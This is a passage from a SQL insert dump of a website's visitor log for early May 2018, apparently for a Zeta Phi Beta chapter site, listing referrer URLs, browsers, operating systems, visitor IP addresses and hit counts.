18-05-02','http://www.zphibmaryland.org/chapters/','Chrome','Windows','66.0.3359.139','','69.195.247.116','000',3,0),(29833,'2018-05-02','https://zphiblgz.org','Chrome','Windows','60.0.3112.90','','77.247.181.162','000',1,0),(29834,'2018-05-02','https://zphiblgz.org','Chrome','Windows','60.0.3112.90','','185.100.87.207','000',1,0),(29835,'2018-05-02','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29836,'2018-05-02','https://search.yahoo.com/','Chrome','Windows','66.0.3359.139','','174.44.104.11','000',2,0),(29837,'2018-05-02','https://zphiblgz.org','Firefox','Windows','40.1','','41.82.165.45','000',2,0),(29838,'2018-05-02','https://slomm.ru/','MSIE','Windows','6.0','','5.248.196.93','000',3,0),(29839,'2018-05-02','https://hoztorg-opt.ru/','MSIE','Windows','6.0','','46.119.118.96','000',6,0),(29840,'2018-05-02','http://www.stavimdveri.ru/sitemap.html','Opera','Windows','7.60','','178.137.165.61','000',4,0),(29841,'2018-05-02','https://brillianty.info/','MSIE','Windows','6.0','','46.118.114.175','000',4,0),(29842,'2018-05-02','http://zphiblgz.org/e107_admin/admin.php','Opera Next','Windows','49.0.2711.0','','185.130.184.223','000',1,0),(29843,'2018-05-02','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.30','000',1,0),(29844,'2018-05-02','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(29845,'2018-05-02','https://www.google.com/','Safari','Macintosh','10.0.3','','108.252.144.12','000',2,0),(29846,'2018-05-02','https://search.yahoo.com/','Chrome','Windows','66.0.3359.117','','73.39.186.188','000',3,0),(29847,'2018-05-02','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(29848,'2018-05-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.79.186.194','000',2,0),(29849,'2018-05-02','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwiIuZPLwujaAhUNmuAKHSUuAdAQjRx6BAgBEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw3JEiCY9-Qw-hPJUT9Y-ahJ&ust=1525401772562678','MSIE','Windows','11.0','','73.216.197.179','000',3,0),(29850,'2018-05-02','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(29851,'2018-05-02','https://zphiblgz.org/membership/','Firefox','Windows','43.0','','109.86.71.21','000',2,0),(29852,'2018-05-03','https://zphiblgz.org','Firefox','Windows','57.0','','92.114.62.20','000',2,0),(29853,'2018-05-03','http://www.regionshop.biz/','MSIE','Windows','6.0','','178.137.165.61','000',1,0),(29854,'2018-05-03','https://workius.ru/','MSIE','Windows','6.0','','37.115.185.9','000',3,0),(29855,'2018-05-03','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.31','000',1,0),(29856,'2018-05-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.30','000',1,0),(29857,'2018-05-03','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','5.9.145.132','000',1,0),(29858,'2018-05-03','https://zphiblgz.org','Firefox','Windows','27.0','','23.106.195.231','000',2,0),(29859,'2018-05-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.60.250','000',2,0),(29860,'2018-05-03','https://goodhumor24.com/','Unknown','Unknown','Unknown','','46.119.118.96','000',2,0),(29861,'2018-05-03','http://fidalsa.de/','Opera','Windows','9.0','','46.118.114.175','000',2,0),(29862,'2018-05-03','https://animenime.ru/','MSIE','Windows','2.0','','46.118.114.175','000',2,0),(29863,'2018-05-03','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(29864,'2018-05-03','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1776.VdHI6PyktzI3k5Mr5iWoGZMvaoMWVyawrsjW8ag45gI.3e3f0f9e2cfdad76e74543001466543701ba5e0a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043aE1xYjA0QjRfcHBBVFMyN3hmMzQ3UlZqNWFLWG55eWZpbUdTQlVwbmFadyws&sign=c69606536bd2f0d3e4af92a6249d6939&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(29865,'2018-05-03','http://zphiblgz.org/index.php/login','Opera Next','Windows','49.0.2711.0','','185.130.184.223','000',2,0),(29866,'2018-05-03','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1776.lQlnMojI71q6X5SkQqeJvwgAIK0Ko_Eq-NJna_J45Tw.9e6632499ee8fdd58cc5aad259eed88a31cdf5bf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dm1ZZGlyN3gtanhBUFJkRWRjYTU1cUNTZExOYWFuRmdEeVNzUFJmOW4xUSws&sign=9422c1a4b6eeb6839f9acb8cce21de2b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','107.170.209.219','000',2,0),(29867,'2018-05-03','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1776.wrFjiYIPS_8Urt9lps4tWJw4BhXjqXcY8DQsplBO0Ow.5b8147402fd7648e6dbaa60d27e320235716ef88&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VGhPSlR1NkdtVVJobTlOUUsxWDU2ZVJ4cU9ORTNKVTdkMUxjR2lDREVSUSws&sign=8666a2dad7e2abbf79a103da631ed41a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','164.132.211.152','000',2,0),(29868,'2018-05-03','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(29869,'2018-05-03','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(29870,'2018-05-03','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1776.GMazrjldphYx9iirD9tms0nia1BpuThFwZaXFgzJ9Dk.03d199e56f3e49d39c3dcaa7936a7f0211d9997e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042M0F6R3RkTHRhZ2dLcE90aDl2S296RzNSY01wSUlHR0JWeVAxM05PbzdJdyws&sign=698f4882f48c9ff157f2b82cdab089be&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.90.122.68','000',2,0),(29871,'2018-05-03','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(29872,'2018-05-03','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.28','000',1,0),(29873,'2018-05-03','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.28','000',1,0),(29874,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.109','000',2,0),(29875,'2018-05-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.250','000',2,0),(29876,'2018-05-03','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.254','000',1,0),(29877,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.190.246','000',1,0),(29878,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.251','000',2,0),(29879,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.98','000',2,0),(29880,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.75','000',2,0),(29881,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.66','000',2,0),(29882,'2018-05-03','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.170','000',2,0),(29883,'2018-05-03','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.130.20.61','000',2,0),(29884,'2018-05-03','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(29885,'2018-05-03','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.99.9.147','000',2,0),(29886,'2018-05-03','https://zphiblgz.org/','Firefox','Windows','52.0','','94.103.232.230','000',1,0),(29887,'2018-05-03','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(29888,'2018-05-03','https://zphiblgz.org','Opera Next','Windows','47.0.2631.55','','180.241.172.198','000',2,0),(29889,'2018-05-03','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(29890,'2018-05-03','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1777.hXWDQwXua7VM8Wqj4BPH-b00f_HSpiLvnoLiKWVq6W0qxMkex5NdiAyp7bqh82xl.66d41afb610b2a40ea497fa8df15cbc168b60115&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxYZ2xsMVE0RVN0Y3pVYlEyemF2QU5NbDB6QjBFOUh3U0V6Q1RIdVFfSmtKUkQ4OE5lUzdRV0k1ZnJPcFgyekQwVV9seV94NDRyZG0&b64e=2&sign=a5553c5ba47bcc762fc08797baf157c3&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbi0Tsf_URaGYUkNJFb_2m7c9_MmwBXTZkzjYef_BfpFKwZ_yUAP4pIqjjOuawe0Mf-7kbLra-obyf29icJXeHaXaPtAw9UsHO8zE1FBVi1LJDBRRHMrh225A&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjjfneyWes3xfUSXaBXZMu2kbr_Cr4gFwnnD11R06ZVRu72tBvgEUvXU3nj0nr4Qk6g&l10n=ru&cts=1525370006865&mc=2.55239725853','MSIE','Windows','10.0','','176.193.119.122','000',1,0),(29891,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.220','000',1,0),(29892,'2018-05-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.57.187','000',1,0),(29893,'2018-05-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(29894,'2018-05-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(29895,'2018-05-03','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(29896,'2018-05-03','http://zphiblgz.org/','Firefox','Windows','41.0','','137.74.132.80','000',3,0),(29897,'2018-05-03','https://www.google.com/','Safari','iPhone','10.0','','73.172.63.178','000',3,0),(29898,'2018-05-03','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.73.70','000',18,0),(29899,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.73.70','000',1,0),(29900,'2018-05-03','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29901,'2018-05-03','https://www.google.com/','Safari','iPad','7.0','','68.134.38.104','000',3,0),(29902,'2018-05-03','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29903,'2018-05-03','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','123.30.235.19','000',1,0),(29904,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.6.167','000',3,0),(29905,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.5.212','000',4,0),(29906,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.217.30','000',2,0),(29907,'2018-05-03','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(29908,'2018-05-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.230','000',1,0),(29909,'2018-05-03','https://zphiblgz.org','Firefox','Windows','40.1','','115.186.57.230','000',2,0),(29910,'2018-05-03','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.99','000',1,0),(29911,'2018-05-03','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(29912,'2018-05-03','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','34.245.235.127','000',2,0),(29913,'2018-05-03','http://zphiblgz.org/','Chrome','Windows','32.0.1700.76','','190.0.22.10','000',1,0),(29914,'2018-05-03','https://zphiblgz.org/','Chrome','Windows','32.0.1700.76','','195.22.125.74','000',1,0),(29915,'2018-05-03','http://www.zphibmaryland.org/chapters/','Chrome','Android','66.0.3359.126','','174.205.0.102','000',5,0),(29916,'2018-05-03','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.188.154','000',1,0),(29917,'2018-05-03','https://zphiblgz.org','Chrome','Linux','64.0.3282.167','','124.93.96.216','000',3,0),(29918,'2018-05-04','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(29919,'2018-05-04','http://www.zphiblgz.org/','Chrome','Windows','23.0.1271.97','','103.242.3.151','000',2,0),(29920,'2018-05-04','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.230.231','000',2,0),(29921,'2018-05-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.171.163','000',1,0),(29922,'2018-05-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1777.M7N1ICZr3fwt7w2CdJicn0InE4-zoYeOGf3wo54wDOU.f6d456ce68a11485296c53fdd48caf5c7ef68337&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040U29GVVBTeE9ueGNhalQzcDdqUUVKMXNBZDcyak9EeXg1aUlHZ0JlV25vQSws&sign=21b90510cc607f0d7689fee3987117a9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','18.218.204.103','000',2,0),(29923,'2018-05-04','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.141','000',3,0),(29924,'2018-05-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1777.uGY2kiJ35X9QRbIBhKtBBUCIIJYAQNOSwBASoBiLlDU.4f2323171f2900eea9c9ff6b3728141b38c2b4f0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZnpseTB2VWZjRW45WnJDRXJUTHFMOV80SzZMbXRBaGR0ZWhvYUprQW1YQSws&sign=fa5797f7a32646fc84b6f5c19002aaa0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.220.205','000',2,0),(29925,'2018-05-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1777.pxmPvoC4PT3fU5pfAtAGykqP9FWB-dm1ghxE-J3SXDw.0b7a21446a0306fea9c902cb4ff0356583b929cb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cEhsRTM1aU91MjR0VFF2VnVGZDRkX1ZWZkRpUUR2dkhMWWhTUEJsc29wdyws&sign=b4418ebb81a55ca7807e9b9aae6773ba&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.164.247','000',2,0),(29926,'2018-05-04','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1777.Ldg9Q0fHKaJhOhlFZV8HtTbfXk3gYwXiCe-Lvi2_Zwg.142844026b80544a56b0470fe63052e0d0201de5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RWFjN3NjaFlmUHFBZmxLV3NPNmkzcEVZM19zdFhWZl9DZ09NaFZJYVBHUSws&sign=b6b9647a19a2f10b7f3ee7813c81cad0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.135.18','000',2,0),(29927,'2018-05-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(29928,'2018-05-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(29929,'2018-05-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.220','000',1,0),(29930,'2018-05-04','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(29931,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.250','000',2,0),(29932,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.169.253','000',1,0),(29933,'2018-05-04','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(29934,'2018-05-04','http://google.com','Firefox','Windows','9.0.1','','2.60.41.13','000',2,0),(29935,'2018-05-04','https://www.google.com/','Safari','iPhone','11.0','','172.58.96.167','000',2,0),(29936,'2018-05-04','https://www.google.com/','Chrome','Macintosh','66.0.3359.139','','152.3.43.23','000',1,0),(29937,'2018-05-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.56','000',13,0),(29938,'2018-05-04','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(29939,'2018-05-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.130.183.184','000',1,0),(29940,'2018-05-04','https://www.google.com/','Chrome','Windows','66.0.3359.139','','167.91.3.13','000',1,0),(29941,'2018-05-04','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(29942,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.130','000',2,0),(29943,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.171.134','000',1,0),(29944,'2018-05-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(29945,'2018-05-04','http://zphiblgz.org/','Chrome','Linux','56.0.2924.87','','163.172.4.153','000',1,0),(29946,'2018-05-04','https://zphiblgz.org/','MSIE','Windows','11.0','','163.172.4.153','000',1,0),(29947,'2018-05-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','93.180.64.230','000',1,0),(29948,'2018-05-04','https://store-rx.com/blog/fr/','MSIE','Windows','6.0','','46.118.114.175','000',2,0),(29949,'2018-05-04','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','137.74.132.80','000',2,0),(29950,'2018-05-04','https://slomm.ru/','MSIE','Windows','6.0','','5.248.196.93','000',3,0),(29951,'2018-05-04','https://www.google.com/','Chrome','Android','66.0.3359.126','','99.203.80.25','000',3,0),(29952,'2018-05-04','https://zphiblgz.org','Firefox','Windows','40.1','','14.185.232.136','000',2,0),(29953,'2018-05-04','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(29954,'2018-05-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.115.176','000',1,0),(29955,'2018-05-04','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(29956,'2018-05-04','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(29957,'2018-05-04','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(29958,'2018-05-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(29959,'2018-05-04','http://zphiblgz.org/scholarship/','Chrome','Android','66.0.3359.126','','172.56.2.86','000',1,0),(29960,'2018-05-04','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(29961,'2018-05-04','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(29962,'2018-05-04','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(29963,'2018-05-04','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.28','000',1,0),(29964,'2018-05-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.86.162','000',1,0),(29965,'2018-05-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(29966,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','96.127.158.234','000',2,0),(29967,'2018-05-04','https://zphiblgz.org/','Firefox','Windows','30.0','','62.122.95.69','000',2,0),(29968,'2018-05-04','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.130.20.61','000',2,0),(29969,'2018-05-04','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','96.127.158.237','000',1,0),(29970,'2018-05-05','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(29971,'2018-05-05','https://www.google.com/','Chrome','Android','66.0.3359.126','','73.39.186.188','000',1,0),(29972,'2018-05-05','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.25.129','000',2,0),(29973,'2018-05-05','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',14,0),(29974,'2018-05-05','http://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','192.210.166.216','000',3,0),(29975,'2018-05-05','http://zphiblgz.org/','Opera','Windows','12.17','','192.210.166.216','000',5,0),(29976,'2018-05-05','http://zphiblgz.org/','PHP','Unknown','Unknown','','192.210.166.216','000',2,0),(29977,'2018-05-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1778.uodglk9BNH7Y9w40MX_tGUWBFFx1-AXAmGFHyqikuMs.c1a20dc339031519b99e3e70e1da66132e176fa5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VDVHUk5TMUNfazlLOENCcmRlNHRoQ0J5VWFjeldpaVhuLU1uejc3cUhjQSws&sign=d405b5e824df12c0e3525a512ad2039f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.193.5','000',2,0),(29978,'2018-05-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1778.O8W3jihPojkwWgFWtMAg_LkWMsUglxvzBCI7B38mtOo.fcaf3f8cf57bab3b23135c4f0704d03b6d19e643&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Q1lyOTFIbklfVnFlaW5xTkUzSnduZWU5Sm5iRFNBdHJ1UmpEZnlXX3RrUSws&sign=b243508a91d1a920d08a848b91e840db&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.12.212','000',2,0),(29979,'2018-05-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1778.17o2ZjPQhl5soejEBr3odYgsKl5wZ2SsI10hVxj9cpE.7cf685360f4ac71d6e48cbcd541f868f7c37cfb4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TnlLOVVqOFV6SEFrS0VVX1pXcE9CX0JYcVV5OTBYQ3ZnSmhacVNRRUZkZyws&sign=adbd41c2c2a6b10bb59d46c31b59027b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.79.146.109','000',2,0),(29980,'2018-05-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1778.7ZenVXRs1OfHNuHULi_4rgclgo1Hfn6bjEcNcbO0HoI.43cfabe5ea095ceb8861332fcd4a8f514e91f9f3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VjYyQm1rX0dlOGJpY0ZRbVdHZVlUUHdQMUJqTUdDVXdmMUJ4WW5taEItQSws&sign=9cc5eb9d288c25166cd9b26c93562f88&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.166.33','000',2,0),(29981,'2018-05-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1778.11MPBD1a8RdBr8X_pDSUeAXaM6CsDAgjsA0p78DbvFU.700a70deebf9c49078c7279974d4bb24aecf27f5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041cks2YmM3WS00UFFjSEdCZWdXNWEzVjVaQk84NUdKQnpvcnlYMjhOb01vQSws&sign=e8c1efe7ec96fea68b78e3729d296923&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.162.232.181','000',2,0),(29982,'2018-05-05','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.78','000',1,0),(29983,'2018-05-05','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(29984,'2018-05-05','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29985,'2018-05-05','https://www.google.com/','Safari','iPhone','11.0','','107.77.204.90','000',4,0),(29986,'2018-05-05','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.21','000',1,0),(29987,'2018-05-05','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(29988,'2018-05-05','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(29989,'2018-05-05','https://zphiblgz.org','Firefox','Linux','10.0','','76.177.214.194','000',21,0),(29990,'2018-05-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(29991,'2018-05-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.228','000',1,0),(29992,'2018-05-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(29993,'2018-05-05','https://zphiblgz.org/','Firefox','Windows','39.1','','178.159.37.55','000',2,0),(29994,'2018-05-05','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.29','000',1,0),(29995,'2018-05-05','https://zphiblgz.org','Firefox','Windows','40.1','','31.46.237.145','000',2,0),(29996,'2018-05-05','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(29997,'2018-05-05','https://www.google.com/','Chrome','iPhone','66.0.3359.122','','172.56.3.236','000',3,0),(29998,'2018-05-05','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29999,'2018-05-05','https://zphiblgz.org/','Chrome','iPhone','66.0.3359.122','','68.134.66.188','000',1,0),(30000,'2018-05-05','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(30001,'2018-05-05','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.248.182.154','000',3,0),(30002,'2018-05-05','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(